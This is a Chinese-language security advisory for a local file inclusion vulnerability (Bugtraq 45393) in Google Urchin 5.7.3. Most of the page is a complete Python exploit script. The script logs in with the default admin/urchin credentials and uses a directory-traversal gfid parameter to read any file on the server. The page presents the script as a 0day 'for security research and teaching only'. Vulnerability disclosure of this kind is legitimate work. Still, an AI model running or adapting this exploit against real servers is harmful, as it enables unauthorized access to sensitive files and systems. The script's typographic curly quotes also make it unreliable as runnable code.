受影响系统:
Urchin Urchin Software Urchin 5.7.3
描述:
BUGTRAQ ID: 45393
Google Urchin是使用javascript标签和服务器日志文件的混合解决方案,可将详细信息添加到其报表中,可在服务器上保存所有信息。
Google Urchin在实现上存在输入验证漏洞,攻击者可利用此漏洞获取敏感信息,在网络服务器进程中执行任意本地脚本,控制应用程序和计算机。
<*来源:Kristian Erik Hermansen (kristian.hermansen@gmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
# Author: "Kristian Erik Hermansen" <kristian.hermansen@gmail.com>
# Date: December 2010
# Google Urchin 5.x LFI in gfid parameter (0day)
from sys import argv
import httplib, urllib
if len(argv) < 3:
print ‘usage: %s <host> <file> [port] [user] [pass]’ % (argv[0])
exit(1)
HOST = argv[1]
FILE = argv[2]
PORT = int(argv[3]) or 9999
USER = argv[4] or ‘admin’
PASS = argv[5] or ‘urchin’
conn = httplib.HTTPConnection(‘%s:%d’ % (HOST,PORT))
conn.request(‘GET’, ‘/’)
response = conn.getresponse()
if str(response.status)[0] == ‘3’:
print ‘[-] Host probably uses SSL. Not supported.’
exit(2)
data = response.read()
app = data.split(‘<input type="hidden" name="app" value="’)[1].split(‘"’)[0]
params = urllib.urlencode({‘user’: USER, ‘pass’: PASS, ‘app’: app,
‘action’: ‘login’})
conn.request(‘POST’, ‘/session.cgi’, params)
response = conn.getresponse()
data = response.read()
if data.find(‘Authentication Failed.’) == -1:
print ‘[*] Authentication succeeded :)’
else:
print ‘[-] Authentication failed :(‘
exit(3)
sid = data.split(‘?sid=’)[1].split(‘&’)[0]
rid = data.split(‘<a href="javascript:openReport(‘)[1].split(‘,’)[0]
if app == ‘admin.exe’:
pad = ‘..\\’*16
else:
pad = ‘../’*16
conn.request(‘GET’,
‘/session.cgi?sid=%s&action=prop&app=urchin.cgi&rid=%s&cmd=svg&gfid=%s%s&ie5=.svg’
% (sid,rid,pad,FILE))
response = conn.getresponse()
data = response.read()
if data.find(‘SVG image not found. Possible causes are:’) == -1:
print data
else:
print ‘[-] Failed to retrive requested file. May not exist on host.’
conn.close()
建议:
厂商补丁:
Urchin
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.roirevolution.com/urchin/
0 条评论。